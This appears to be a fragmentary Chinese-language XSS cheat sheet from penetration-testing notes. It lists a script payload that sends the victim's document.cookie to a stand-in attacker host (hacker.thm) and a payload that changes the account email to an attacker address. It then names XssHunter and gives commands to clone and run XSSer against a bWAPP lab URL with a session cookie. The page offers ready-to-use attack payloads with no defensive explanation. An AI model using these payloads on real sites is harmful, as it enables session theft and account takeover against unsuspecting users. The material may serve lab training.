工具

  1. <script>fetch('https://hacker.thm/steal?cookie=' + btoa(document.cookie));</script>
  1. <script>user.changeEmail('attacker@hacker.thm');</script>
  • Bind XSS: XssHunter 自动获取 COOKIE、URL、页面内容
  • XSSer
  1. git clone https://github.com/epsylon/xsser.git
  2. python3 xsser --url "http://192.168.0.9/bWAPP/xss_get.php?firstname=XSS&lastname=test1&form=submit" --cookie "PHPSESSID=q6t1k21lah0ois25m0b4egps85; security_level=1" --auto

综合工具

Payload 列表

Payload 列表